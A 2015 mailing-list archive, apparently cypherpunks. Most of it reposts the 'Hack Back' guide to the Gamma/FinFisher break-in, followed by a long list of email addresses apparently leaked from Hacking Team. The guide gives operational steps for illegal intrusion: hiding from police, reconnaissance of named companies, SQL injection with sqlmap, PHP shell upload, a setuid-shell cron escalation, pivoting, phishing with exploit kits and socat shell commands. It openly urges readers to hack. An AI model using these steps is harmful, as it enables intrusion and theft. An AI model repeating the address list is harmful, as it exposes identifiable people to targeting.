cities, hell it just doesn't seem > practical at all unless you live near an exchange or are willing to do > credit card transactions that cost on top of the exchange and make the > currency traceable. > -------------- next part -------------- A non-text attachment was scrubbed... 
Name: not available Type: text/html Size: 1008 bytes Desc: not available URL: From Rayzer at riseup.net Thu Jul 9 10:04:04 2015 From: Rayzer at riseup.net (Razer) Date: Thu, 09 Jul 2015 10:04:04 -0700 Subject: Hacking Team has been hacked (hard, and long) In-Reply-To: References: <5599F683.40200@gna.org> <559C4E88.4050506@riseup.net> Message-ID: <559EA984.1000705@riseup.net> On 07/08/2015 03:29 AM, coderman wrote: > why just the header Rayzer? > > a guide this good demands completeness > > --- >> B/c Listiquette (Trim your posts) Albeit that may be from the day when people paid by the byte for internet service. Should I post the entirety? It's kinda long. >> >> RR On 07/08/2015 03:55 PM, coderman wrote: > On 7/8/15, Razer wrote: > ... that may be from the day when > people paid by the byte for internet service. Should I post the > entirety? It's kinda long. >> JYA and me and history prefer verbatim, >> and long since gone the days when bandwidth bytes begged brevity >> >> now, just /s TL;DR or ignore... [ and yes the whole thing :P ] >> >> >> best regards, ---------------------------------------------------------------------- ----------------------------------------------------- _ _ _ ____ _ _ | | | | __ _ ___| | __ | __ ) __ _ ___| | _| | | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / | | _ | (_| | (__| < | |_) | (_| | (__| <|_| |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_) A DIY Guide for those without the patience to wait for whistleblowers --[ 1 ]-- Introduction I'm not writing this to brag about what an 31337 h4x0r I am and what m4d sk1llz it took to 0wn Gamma. I'm writing this to demystify hacking, to show how simple it is, and to hopefully inform and inspire you to go out and hack shit. If you have no experience with programming or hacking, some of the text below might look like a foreign language. Check the resources section at the end to help you get started. 
And trust me, once you've learned the basics you'll realize this really is easier than filing a FOIA request. --[ 2 ]-- Staying Safe This is illegal, so you'll need to take some basic precautions: 1) Make a hidden encrypted volume with Truecrypt 7.1a [0] 2) Inside the encrypted volume install Whonix [1] 3) (Optional) While just having everything go over Tor thanks to Whonix is probably sufficient, it's better to not use an internet connection connected to your name or address. A cantenna, aircrack, and reaver can come in handy here. [0] https://truecrypt.ch/downloads/ [1] https://www.whonix.org/wiki/Download#Install_Whonix As long as you follow common sense like never do anything hacking related outside of Whonix, never do any of your normal computer usage inside Whonix, never mention any information about your real life when talking with other hackers, and never brag about your illegal hacking exploits to friends in real life, then you can pretty much do whatever you want with no fear of being v&. NOTE: I do NOT recommend actually hacking directly over Tor. While Tor is usable for some things like web browsing, when it comes to using hacking tools like nmap, sqlmap, and nikto that are making thousands of requests, they will run very slowly over Tor. Not to mention that you'll want a public IP address to receive connect back shells. I recommend using servers you've hacked or a VPS paid with bitcoin to hack from. That way only the low bandwidth text interface between you and the server is over Tor. All the commands you're running will have a nice fast connection to your target. --[ 3 ]-- Mapping out the target Basically I just repeatedly use fierce [0], whois lookups on IP addresses and domain names, and reverse whois lookups to find all IP address space and domain names associated with an organization. [0] http://ha.ckers.org/fierce/ For an example let's take Blackwater. We start out knowing their homepage is at academi.com. 
Running fierce.pl -dns academi.com we find the subdomains: 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com Now we do whois lookups and find the homepage of www.academi.com is hosted on Amazon Web Service, while the other IPs are in the range: NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd Doing a whois lookup on academi.com reveals it's also registered to the same address, so we'll use that as a string to search with for the reverse whois lookups. As far as I know all the actual reverse whois lookup services cost money, so I just cheat with google: "850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools Now run fierce.pl -range on the IP ranges you find to lookup dns names, and fierce.pl -dns on the domain names to find subdomains and IP addresses. Do more whois lookups and repeat the process until you've found everything. Also just google the organization and browse around its websites. For example on academi.com we find links to a careers portal, an online store, and an employee resources page, so now we have some more: 54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com If you repeat the whois lookups and such you'll find academiproshop.com seems to not be hosted or maintained by Blackwater, so scratch that off the list of interesting IPs/domains. In the case of FinFisher what led me to the vulnerable finsupport.finfisher.com was simply a whois lookup of finfisher.com which found it registered to the name "FinFisher GmbH". Googling for: "FinFisher GmbH" inurl:domaintools finds gamma-international.de, which redirects to finsupport.finfisher.com ...so now you've got some idea how I map out a target. 
This is actually one of the most important parts, as the larger the attack surface that you are able to map out, the easier it will be to find a hole somewhere in it. --[ 4 ]-- Scanning & Exploiting Scan all the IP ranges you found with nmap to find all services running. Aside from a standard port scan, scanning for SNMP is underrated. Now for each service you find running: 1) Is it exposing something it shouldn't? Sometimes companies will have services running that require no authentication and just assume it's safe because the url or IP to access it isn't public. Maybe fierce found a git subdomain and you can go to git.companyname.come/gitweb/ and browse their source code. 2) Is it horribly misconfigured? Maybe they have an ftp server that allows anonymous read or write access to an important directory. Maybe they have a database server with a blank admin password (lol stratfor). Maybe their embedded devices (VOIP boxes, IP Cameras, routers etc) are using the manufacturer's default password. 3) Is it running an old version of software vulnerable to a public exploit? Webservers deserve their own category. For any webservers, including ones nmap will often find running on nonstandard ports, I usually: 1) Browse them. Especially on subdomains that fierce finds which aren't intended for public viewing like test.company.com or dev.company.com you'll often find interesting stuff just by looking at them. 2) Run nikto [0]. This will check for things like webserver/.svn/, webserver/backup/, webserver/phpinfo.php, and a few thousand other common mistakes and misconfigurations. 3) Identify what software is being used on the website. WhatWeb is useful [1] 4) Depending on what software the website is running, use more specific tools like wpscan [2], CMS-Explorer [3], and Joomscan [4]. First try that against all services to see if any have a misconfiguration, publicly known vulnerability, or other easy way in. 
If not, it's time to move on to finding a new vulnerability: 5) Custom coded web apps are more fertile ground for bugs than large widely used projects, so try those first. I use ZAP [5], and some combination of its automated tests along with manually poking around with the help of its intercepting proxy. 6) For the non-custom software they're running, get a copy to look at. If it's free software you can just download it. If it's proprietary you can usually pirate it. If it's proprietary and obscure enough that you can't pirate it you can buy it (lame) or find other sites running the same software using google, find one that's easier to hack, and get a copy from them. [0] http://www.cirt.net/nikto2 [1] http://www.morningstarsecurity.com/research/whatweb [2] http://wpscan.org/ [3] https://code.google.com/p/cms-explorer/ [4] http://sourceforge.net/projects/joomscan/ [5] https://code.google.com/p/zaproxy/ For finsupport.finfisher.com the process was: * Start nikto running in the background. * Visit the website. See nothing but a login page. Quickly check for sqli in the login form. * See if WhatWeb knows anything about what software the site is running. * WhatWeb doesn't recognize it, so the next question I want answered is if this is a custom website by Gamma, or if there are other websites using the same software. * I view the page source to find a URL I can search on (index.php isn't exactly unique to this software). I pick Scripts/scripts.js.php, and google: allinurl:"Scripts/scripts.js.php" * I find there's a handful of other sites using the same software, all coded by the same small webdesign firm. It looks like each site is custom coded but they share a lot of code. So I hack a couple of them to get a collection of code written by the webdesign firm. 
At this point I can see the news stories that journalists will write to drum up views: "In a sophisticated, multi-step attack, hackers first compromised a web design firm in order to acquire confidential data that would aid them in attacking Gamma Group..." But it's really quite easy, done almost on autopilot once you get the hang of it. It took all of a couple minutes to: * google allinurl:"Scripts/scripts.js.php" and find the other sites * Notice they're all sql injectable in the first url parameter I try. * Realize they're running Apache ModSecurity so I need to use sqlmap [0] with the option --tamper='tamper/modsecurityversioned.py' * Acquire the admin login information, login and upload a php shell [1] (the check for allowable file extensions was done client side in javascript), and download the website's source code. [0] http://sqlmap.org/ [1] https://epinna.github.io/Weevely/ Looking through the source code they might as well have named it Damn Vulnerable Web App v2 [0]. It's got sqli, LFI, file upload checks done client side in javascript, and if you're unauthenticated the admin page just sends you back to the login page with a Location header, but you can have your intercepting proxy filter the Location header out and access it just fine. [0] http://www.dvwa.co.uk/ Heading back over to the finsupport site, the admin /BackOffice/ page returns 403 Forbidden, and I'm having some issues with the LFI, so I switch to using the sqli (it's nice to have a dozen options to choose from). The other sites by the web designer all had an injectable print.php, so some quick requests to: https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1 reveal that finsupport also has print.php and it is injectable. And it's database admin! For MySQL this means you can read and write files. It turns out the site has magicquotes enabled, so I can't use INTO OUTFILE to write files. 
But I can use a short script that uses sqlmap --file-read to get the php source for a URL, and a normal web request to get the HTML, and then finds files included or required in the php source, and finds php files linked in the HTML, to recursively download the source to the whole site. Looking through the source, I see customers can attach a file to their support tickets, and there's no check on the file extension. So I pick a username and password out of the customer database, create a support request with a php shell attached, and I'm in! --[ 5 ]-- (fail at) Escalating ___________ < got r00t? ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^ Root over 50% of linux servers you encounter in the wild with two easy scripts, Linux_Exploit_Suggester [0], and unix-privesc-check [1]. [0] https://github.com/PenturaLabs/Linux_Exploit_Suggester [1] https://code.google.com/p/unix-privesc-check/ finsupport was running the latest version of Debian with no local root exploits, but unix-privesc-check returned: WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer so I add to /etc/cron.hourly/webalizer: chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell wait an hour, and ....nothing. Turns out that while the cron process is running it doesn't seem to be actually running cron jobs. Looking in the webalizer directory shows it didn't update stats the previous month. Apparently after updating the timezone cron will sometimes run at the wrong time or sometimes not run at all and you need to restart cron after changing the timezone. ls -l /etc/localtime shows the timezone got updated June 6, the same time webalizer stopped recording stats, so that's probably the issue. 
At any rate, the only thing this server does is host the website, so I already have access to everything interesting on it. Root wouldn't get much of anything new, so I move on to the rest of the network. --[ 6 ]-- Pivoting The next step is to look around the local network of the box you hacked. This is pretty much the same as the first Scanning & Exploiting step, except that from behind the firewall many more interesting services will be exposed. A tarball containing a statically linked copy of nmap and all its scripts that you can upload and run on any box is very useful for this. The various nfs-* and especially smb-* scripts nmap has will be extremely useful. The only interesting thing I could get on finsupport's local network was another webserver serving up a folder called 'qateam' containing their mobile malware. --[ 7 ]-- Have Fun Once you're in their networks, the real fun starts. Just use your imagination. While I titled this a guide for wannabe whistleblowers, there's no reason to limit yourself to leaking documents. My original plan was to: 1) Hack Gamma and obtain a copy of the FinSpy server software 2) Find vulnerabilities in FinSpy server. 3) Scan the internet for, and hack, all FinSpy C&C servers. 4) Identify the groups running them. 5) Use the C&C server to upload and run a program on all targets telling them who was spying on them. 6) Use the C&C server to uninstall FinFisher on all targets. 7) Join the former C&C servers into a botnet to DDoS Gamma Group. It was only after failing to fully hack Gamma and ending up with some interesting documents but no copy of the FinSpy server software that I had to make do with the far less lulzy backup plan of leaking their stuff while mocking them on twitter. Point your GPUs at FinSpy-PC+Mobile-2012-07-12-Final.zip and crack the password already so I can move on to step 2! 
--[ 8 ]-- Other Methods The general method I outlined above of scan, find vulnerabilities, and exploit is just one way to hack, probably better suited to those with a background in programming. There's no one right way, and any method that works is as good as any other. The other main ways that I'll state without going into detail are: 1) Exploits in web browsers, java, flash, or microsoft office, combined with emailing employees with a convincing message to get them to open the link or attachment, or hacking a web site frequented by the employees and adding the browser/java/flash exploit to that. This is the method used by most of the government hacking groups, but you don't need to be a government with millions to spend on 0day research or subscriptions to FinSploit or VUPEN to pull it off. You can get a quality russian exploit kit for a couple thousand, and rent access to one for much less. There's also metasploit browser autopwn, but you'll probably have better luck with no exploits and a fake flash updater prompt. 2) Taking advantage of the fact that people are nice, trusting, and helpful 95% of the time. The infosec industry invented a term to make this sound like some sort of science: "Social Engineering". This is probably the way to go if you don't know too much about computers, and it really is all it takes to be a successful hacker [0]. 
[0] https://www.youtube.com/watch?v=DB6ywr9fngU --[ 9 ]-- Resources Links: * https://www.pentesterlab.com/exercises/ * http://overthewire.org/wargames/ * http://www.hackthissite.org/ * http://smashthestack.org/ * http://www.win.tue.nl/~aeb/linux/hh/hh.html * http://www.phrack.com/ * http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot * http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash * https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ * https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers (all his other blog posts are great too) * https://www.corelan.be/ (start at Exploit writing tutorial part 1) * http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ One trick it leaves out is that on most systems the apache access log is readable only by root, but you can still include from /proc/self/fd/10 or whatever fd apache opened it as. It would also be more useful if it mentioned what versions of php the various tricks were fixed in. * http://www.dest-unreach.org/socat/ Get usable reverse shells with a statically linked copy of socat to drop on your target and: target$ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp-listen:PORTNUM host$ socat file:`tty`,raw,echo=0 tcp-connect:localhost:PORTNUM It's also useful for setting up weird pivots and all kinds of other stuff. Books: * The Web Application Hacker's Handbook * Hacking: The Art of Exploitation * The Database Hacker's Handbook * The Art of Software Security Assessment * A Bug Hunter's Diary * Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier * TCP/IP Illustrated Aside from the hacking specific stuff almost anything useful to a system administrator for setting up and administering networks will also be useful for exploring them. 
This includes familiarity with the windows command prompt and unix shell, basic scripting skills, knowledge of ldap, kerberos, active directory, networking, etc. --[ 10 ]-- Outro You'll notice some of this sounds exactly like what Gamma is doing. Hacking is a tool. It's not selling hacking tools that makes Gamma evil. It's who their customers are targeting and with what purpose that makes them evil. That's not to say that tools are inherently neutral. Hacking is an offensive tool. In the same way that guerrilla warfare makes it harder to occupy a country, whenever it's cheaper to attack than to defend it's harder to maintain illegitimate authority and inequality. So I wrote this to try to make hacking easier and more accessible. And I wanted to show that the Gamma Group hack really was nothing fancy, just standard sqli, and that you do have the ability to go out and take similar action. Solidarity to everyone in Gaza, Israeli conscientious-objectors, Chelsea Manning, Jeremy Hammond, Peter Sunde, anakata, and all other imprisoned hackers, dissidents, and criminals! ==30== -------------- next part -------------- A non-text attachment was scrubbed... 
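Seen from the defender's side, the paired `print.php?id=1 and 1=1` / `and 2=1` requests quoted in the guide above leave a recognisable trace in a web server's access log. The following Python example is added here and is not part of the original post or of any tool it names; the log lines, addresses and paths are constructed, and the function names are hypothetical. It goes slightly beyond the quoted pair by also handling raw spaces, other comparison operators and SQL comment delimiters.

```python
"""Flag boolean-based SQL injection probe pairs in a web access log."""
import operator
import re
from collections import defaultdict
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample in Apache combined log format (documentation addresses,
# made-up paths). The third client sends raw spaces in the request line.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Jul/2015:09:14:01 +0000] "GET /print.php?id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Jul/2015:09:14:05 +0000] "GET /print.php?id=1%20and%201=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Jul/2015:09:14:06 +0000] "GET /print.php?id=1%20and%202=1 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.20 - - [10/Jul/2015:09:20:44 +0000] "GET /search.php?q=salt+and+pepper HTTP/1.1" 200 3301 "-" "Mozilla/5.0"
192.0.2.55 - - [10/Jul/2015:10:02:11 +0000] "GET /news.php?item=3 AND 5=5 HTTP/1.1" 200 2048 "-" "-"
192.0.2.55 - - [10/Jul/2015:10:02:12 +0000] "GET /news.php?item=3 AND 5=6 HTTP/1.1" 200 2048 "-" "-"
"""

# The target is matched lazily up to " HTTP/x.y" so that unencoded spaces
# inside the request line do not truncate the query string.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]*\] '
    r'"[A-Z]+ (?P<target>.+?) HTTP/[\d.]+" \d{3} (?P<size>\d+|-)'
)
LITERAL = r"""(\d+|'[^']*'|"[^"]*")"""
# "and"/"or" followed by a comparison between two literals, e.g. "and 1=1".
PREDICATE_RE = re.compile(
    r"\b(?:and|or)\b[\s(]*" + LITERAL + r"\s*(=|!=|<>|<|>)\s*" + LITERAL,
    re.IGNORECASE,
)
OPS = {"=": operator.eq, "!=": operator.ne, "<>": operator.ne,
       "<": operator.lt, ">": operator.gt}


def normalize(value):
    """Undo common obfuscation of a parameter value before matching."""
    value = unquote(value)  # second layer of percent-encoding, if any
    # MySQL executes the body of /*!NNNNN ... */ comments, so drop only the
    # comment delimiters and keep whatever was inside them.
    value = re.sub(r"/\*!?\d*|\*/", " ", value)
    return re.sub(r"\s+", " ", value)


def predicate_truth(left, op, right):
    """Evaluate a literal comparison (strings compare as text, an approximation)."""
    if left.isdigit() and right.isdigit():
        a, b = int(left), int(right)
    else:
        a, b = left.strip("'\""), right.strip("'\"")
    return OPS[op](a, b)


def find_boolean_probes(log_text):
    """Return one finding per (client, path, parameter) that received both an
    always-true and an always-false predicate."""
    seen = defaultdict(lambda: {True: [], False: []})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        size = 0 if m["size"] == "-" else int(m["size"])
        for param, raw in parse_qsl(url.query, keep_blank_values=True):
            for left, op, right in PREDICATE_RE.findall(normalize(raw)):
                truth = predicate_truth(left, op, right)
                seen[(m["client"], url.path, param)][truth].append(size)
    findings = []
    for (client, path, param), sizes in sorted(seen.items()):
        if sizes[True] and sizes[False]:
            findings.append({
                "client": client, "path": path, "param": param,
                "requests": len(sizes[True]) + len(sizes[False]),
                # Different body sizes for true vs. false predicates suggest
                # the value reaches the SQL statement unparameterised.
                "response_differs": set(sizes[True]).isdisjoint(sizes[False]),
            })
    return findings


if __name__ == "__main__":
    for finding in find_boolean_probes(SAMPLE_LOG):
        print(finding)
```

A finding with `response_differs` set is the one to triage first: the true and false predicates produced different pages, which is the behaviour a parameterised query removes.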
Name: signature.asc Type: application/pgp-signature Size: 819 bytes Desc: OpenPGP digital signature URL: From jya at pipeline.com Thu Jul 9 07:12:06 2015 From: jya at pipeline.com (John Young) Date: Thu, 09 Jul 2015 10:12:06 -0400 Subject: Caspar Bowden has died Message-ID: Privacy activist Caspar Bowden has died https://translate.google.com/translate?sl=auto&tl=en&js=y&prev=_t&hl=en&ie=UTF-8&u=https%3A%2F%2Fnetzpolitik.org%2F2015%2Fdatenschutz-aktivist-caspar-bowden-ist-gestorben%2F&edit-text= From Rayzer at riseup.net Thu Jul 9 10:20:33 2015 From: Rayzer at riseup.net (Razer) Date: Thu, 09 Jul 2015 10:20:33 -0700 Subject: Hacking Team has been hacked (hard, and long) In-Reply-To: References: <5599F683.40200@gna.org> <559C4E88.4050506@riseup.net> <559D4A13.6070301@riseup.net> Message-ID: <559EAD61.5020502@riseup.net> On 07/08/2015 03:55 PM, coderman wrote: > On 7/8/15, Razer wrote: >> ... that may be from the day when >> people paid by the byte for internet service. Should I post the >> entirety? It's kinda long. > > JYA and me and history prefer verbatim, > and long since gone the days when bandwidth bytes begged brevity > > now, just /s TL;DR or ignore... [ and yes the whole thing :P ] > > > best regards, The bounceback to RiseUp mail triggered the possible ***SPAM*** indicator. Something that never happens with person-person emails. Apparently I'm NOT alone in the previously stated sentiment, or perhaps it's the number of links in the post. RR -------------- next part -------------- A non-text attachment was scrubbed... 
Name: signature.asc Type: application/pgp-signature Size: 819 bytes Desc: OpenPGP digital signature URL: From jya at pipeline.com Thu Jul 9 08:32:18 2015 From: jya at pipeline.com (John Young) Date: Thu, 09 Jul 2015 11:32:18 -0400 Subject: WABC radio Seeks NYSE Outage Leads Message-ID: Aaron Klein, WABC radio, NYC, seeks tips, leads on NYSE and other outages http://aol.com > -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 195 bytes Desc: not available URL: From coderman at gmail.com Thu Jul 9 17:19:11 2015 From: coderman at gmail.com (coderman) Date: Thu, 9 Jul 2015 17:19:11 -0700 Subject: From: root@hackingteam.it To: vince@hackingteam.it [and who?] Message-ID: https://wikileaks.org/hackingteam/emails/emailid/144932
mail.mil blcs at bol.com.br blountph at gmail.com bluesky_malaysia at yahoo.com bmerinofe at gmail.com bmtengwa at potraz.gov.zw bn at pensplan.com bo.a.johansson at ericsson.com bob at netoptics.com bonanisa at gmail.com bostjan.gacnik at gov.si bostjan.vrecko at telekom.si BramonB at state.gov Brandi.Horita at fairfaxcounty.gov Brenda.M.Nevano at ice.dhs.gov brenda.smith at strathclyde.pnn.police.uk brent.chong at eia.doe.gov bret.lugo at gmail.com brian.ellingson at fairfaxcounty.gov brian.morrison at usss.dhs.gov briannorville at gmail.com bruce.gaffney at us.army.mil bruno.ae at modcom.com.my bryant.fair at leo.gov bsakhr at yahoo.fr BSAKHR at yahoo.fr bshah at polariswireless.com bsil48 at aol.com bsmith at alpharetta.ga.us bsstakes at co.pg.md.us btchoi at kcc.go.kr b.traore at interpol.int budillk at gmail.com bulstsena at gmail.com bvs.form at gmail.com c0axial.l3 at gmail.com c0ldwat3r at hotmail.com caleb.patten at navy.mil calessandrini at gendarmeria.va calm at corner.ch calvinnkadimeng at gmail.com calvin.sigur at dhs.gov cambell at bnm.gov.my Cameron.Holmes at azag.gov capechefc at gmail.com cara.taylor at strathclyde.pnn.police.uk carla.rahal at crbadvocacia.com carlos.alarcon at cmigroupe.com carlos.alonso at dgp.mir.es carlo_zanutto at carrefour.com carl.schuster at cubic.com carmelo.seminara at poliziadistato.it carolinaantigravity at rocketmail.com caroline.george at utimaco.de casale at shorr-kan.com castellano at mondadori.it catalinungurean10 at gmail.com caterina.lamonigrogg at corner.ch cba031 at cba.gov.pl cba059 at cba.gov.pl cba204 at cba.gov.pl c.bini at finlombardasgr.it cbrady at ftc.gov ccline at frontroyalva.com cebourden at gmail.com ceccel at tiscali.it cemal.dikmen at ss8.com cengiz_tarim at yahoo.com cerb at countyofberks.com ceremia at roembus.org cesedo at gmail.com cfaasen at stlouisco.com cgarro at ci.omaha.ne.us cgarton at oculusinfo.com c.goemans at interpol.int cgwalwyn at gmail.com chadibachir at gmail.com chapmanj at 
dnb.com charikleia.zouridaki at sprint.com Charissa.tobing at gmail.com charlene.s.takeno at hawaii.gov charles.eckholdt at ic.fbi.gov charles.kuhno at gmail.com charles.l.cohen at gmail.com charles.munniv at dodiis.mil charles.tivendell at ontario.ca chatreensb at hotmail.com chbang at add.re.kr chcheang at fsm.gov.mo cheryl.davis910 at gmail.com cheshariffothman at yahoo.com.my cheyeanne16 at yahoo.com chiewjy at gmail.com chilikas at yahoo.com chimi_d at hotmail.com chipubsmusic at yahoo.com chitvimolk at kiasia.org chmoreno at agnitio.es chmuhammadafzal at hotmail.com chorton at baltimorecountymd.gov chris.biow at marklogic.com chris.boshoff at vastech.co.za chris.dowland at wvc-ut.gov chris at pinkmatter.com chris.p.moskal at verizon.com chris.selim at homeoffice.gsi.gov.uk christian.foerster05 at bka.bund.de christian.larsen at politiet.no christina.jacquard at ps.gc.ca christophe.caraes at gendarmerie.interieur.gouv.fr christophe at digitale-expertise.nl christopher.beatty at ci.irs.gov christopher.fountain at secureinfo.com christophermfowler at gmail.com christopher.petz at dc.gov ChristopherSkeen at fdle.state.fl.us christopher.walker at ngc.com christopher.whitford at ic.fbi.gov chrspyrou at gmail.com chubirka at gmail.com cicerorpf at gmail.com cinar.kurra at hawktechnologyllc.com ciprian.miron at roembus.org ckollmann at baltimorecountymd.gov clara.a.scerri-delia at gov.mt clarkliusong at gmail.com Claudio.Arcaini at sparkasse.it claudio.biasin at sparkasse.it claudio_chs at hotmail.com claudio.giuliano at innogest.it cleiton.carreirinha at gmail.com cmc4 at westchestergov.com cmclaugh at ncis.navy.mil cmicewski at attorneygeneral.gov cmmiller at co.pg.md.us cm.susetya at gmail.com coffmanpd at fallstwp.com coloctogami at gmail.com compaqpi at hotmail.com compuomari at gmail.com conferencedesk at hotmail.fr conferences at gmail.com congzon.ccu at gmail.com conradbrit at yahoo.com consejeria.estadosunidos at mir.es cooldudemcrad at gmail.com correoalias 
at hotmail.com corsaiolo1949 at libero.it covacj at state.gov cpassoni at cgt.it cpers at indiagov.org cphillips at njtransit.com CPIB_Project at cpib.gov.sg cpl.mailinglist at gmail.com cp.neerajkumar at nic.in craig.paul at fairfaxcounty.gov crevasse at gmail.com crey at agnitio.es cristiano.visigalli at giorgioarmani.it c.romagnoli at crif.com crsmith at co.pg.md.us csaki.lajos at nmhh.hu c.sinarith at gmail.com cstavrou at howardcountymd.gov cstocker at stlouisco.com cta at interieur.gouv.fr ctaroco at minterior.gub.uy ctk at icginc.com cuongdt at mta.edu.vn curtis.dixon at fairfaxcounty.gov c.vargasmerida at interpol.it cynthia.r.aquino at ice.dhs.gov czanik.laszlo at telekom.hu czech at mfa.gov.by c-zezo at hotmail.com Dad0829 at gmail.com dadig at intellitech-ltd.com dadul_ninja at hotmail.com dafaosing at yahoo.com da at indianembassy.org.br dale.guise at baesystemsdetica.com damion at morphy.net damon.hayes at soca.x.gsi.gov.uk danabatho at gmail.com dana.way at montgomerycountymd.gov dangelushev.sdoto at mvr.bg dani_effi at hotmail.com daniel.almquist at mil.se daniel.brom at alaska.gov daniel.castillo at dhs.gov danielc.hall at dc.gov Daniel.D'Amico at uscp.gov daniel.dunovsky at gmail.com daniele_passadore at carrefour.com daniel.erlandsson at mil.se daniele.sut at interno.it daniel at jupiterprotection.com daniel.maglietta at gmail.com daniel.mellentine at chandleraz.gov daniel.p.hernandez at gmail.com danton at guardiacivil.es d.antoniou at police.gr daohungaryerat at hm.gov.hu dapam2001 at yahoo.com dario.formenti at icbpi.it dario.fortis at auroraassicurazioni.it dario.raschitelli at lonatigroup.com darkop7 at hotmail.com darrell.dain at wvc-ut.gov darren.yee at dhs.gov darya27 at yandex.ru dasabgd at yahoo.com dasilva at dmsinetwork.com dauriemma at gmail.com daveg at yaanatech.com davekann at hotmail.com david94111 at gmail.com david.abadi at verint.com david.ainsworth at vpd.ca davidcrain at fdle.state.fl.us david.cunningham at okc.gov 
david.gessel at strategicsocial.com david.g.turner at dhs.gov david.johnstonjr at us.army.mil David at starkautonomous.com dberlin at icioffshore.com dcellino at gmail.com dcts at stamk.com dcurry at ncmec.org debjbovee at gmail.com Debra.Malette at ci.irs.gov deddy999 at hotmail.com deepkedia at yahoo.com dejanf at bia.gov.rs denise.zierke at pfpa.mil denis.ocallaghan at shape.nato.int denisrizzoli86 at gmail.com denis at taraz.kz Dennis.Haar at SS8.com denys.kattillus at bka.bund.de deraseg2 at yahoo.com derosiaj at oakgov.com derrickeperry at gmail.com desalegnh2010 at gmail.com dgpdea2011 at yahoo.com dhahi.alketbi at hotmail.com dhamlett at rrj.state.va.us dholtzma at montcopa.org d-iaa-111 at hotmail.com dicte at pj.gov.mo diditharikuncoro at yahoo.com diegofuschini at gmail.com digaman27 at yahoo.com digintsbmp at gmail.com dilip at forceindia.net dimaz.agpraz at gmail.com dimitrije.kaljevic at anb.me dimitri.solomon161 at gmail.com dimmy83 at gmail.com dina.gigli at navy.mil dirk.buyse at minfin.fed.be dirk.schrader at np-channel.com djanderson at baltimorecountymd.gov djani.fazlagic at gmail.com dkarajih at ics-saudi.com dmajic at zsis.hr dmitrijus.ganko at policija.lt dndrys at yahoo.com DobesVl at atlas.cz dockeryar at state.gov dogobrazil at gmail.com dolata at aps.edu.pl domenico.vulpiani at interno.it donnelly at glimmerglass.com donovan_s at verizon.net douglas.skinner at dhs.gov dpjsri at hotmail.com dragan.perakovic at fpz.hr drazen.lucic at hakom.hr drewdonofrio at gmail.com droga at ss8.com dtrentham at stlouisco.com duran.julio at gmail.com d.waanders at mindef.nl dwayne_octave at yahoo.com DWong at azdps.gov eala26 at gmail.com eamonn.keane at scdea.pnn.police.uk ebaasanjav at yahoo.com ecarpe at fairfaxcounty.gov ecehangurbuz at yahoo.com.tr echow at mitre.org ecrane at annapolis.gov edafanador at sheriffleefl.org edayanturk at gmail.com eddie.lee at jpm.gov.bn edgar_alexis_o at hotmail.com edgaras.mikusauskas at policija.lt edoardo.f.rospo at 
aexp.com edson at ztec.com.br edvardas.sileris at policija.lt egca06 at orange.fr ehillmann_am at yahoo.fr ehquick at gmail.com ehsan.moghaddam at cyber-wall.com eithan.goldfarb at verint.com ekmerritt at hcsheriff.gov e.kontelis at cybercrimeunit.gr ekotn at cbn.net.id ekrem.hoxha at art-ks.org elbahi_aziz at yahoo.fr elchin_orucov at yahoo.com elda.gualazzi at eni.it ele.peters at clovernigeria.com elhimam at gmail.com elie.salloum at alcatel-lucent.com elin.haugan at politiet.no elisa.sanguedolce at unibo.it Elish.Fuchs at verint.com e.lissaris at cybercrimeunit.gr elizabeth.bayles-jordan at trovicor.com elohim2finder at yahoo.fr e.longhi at crif.com el.senor at hotmail.com elsheikh.gibreel at gmail.com elsheikhgibreel at gmail.com elvio.dallavalentina at prada.com emanuele.levi at 360capitalpartners.com emanuele.marcozzi at areamcr.com emanuel.ross at dc.gov emartinez at agnitio.es eng.abdullateef at live.com engg at pcs-security.com engledowldp at state.gov eni2006 at gmail.com enrico.coppin at ania.it enrico.pagliarini at radio24.it Enrique_burn at yahoo.com enzo.benigni at elt.it enzo.dininno at area.it epifania2003 at yahoo.com eranr at eng.gov.il eric.bolliand at interieur.gouv.fr eric.deane at fairfaxcounty.gov erick.stone at dhs.gov ericmenendez+issworld at hotmail.com ericrabe at sas.upenn.edu eric.rabe at verizon.net erika at eksinta.lt Erik.Stallings at FairfaxCounty.gov erland.kolstad at politiet.no erlpil95 at gmail.com ernesto.canziani at borsaitaliana.it erol_guler at hotmail.com erol-guler at hotmail.com ethionium at gmail.com etn291 at yahoo.co.id 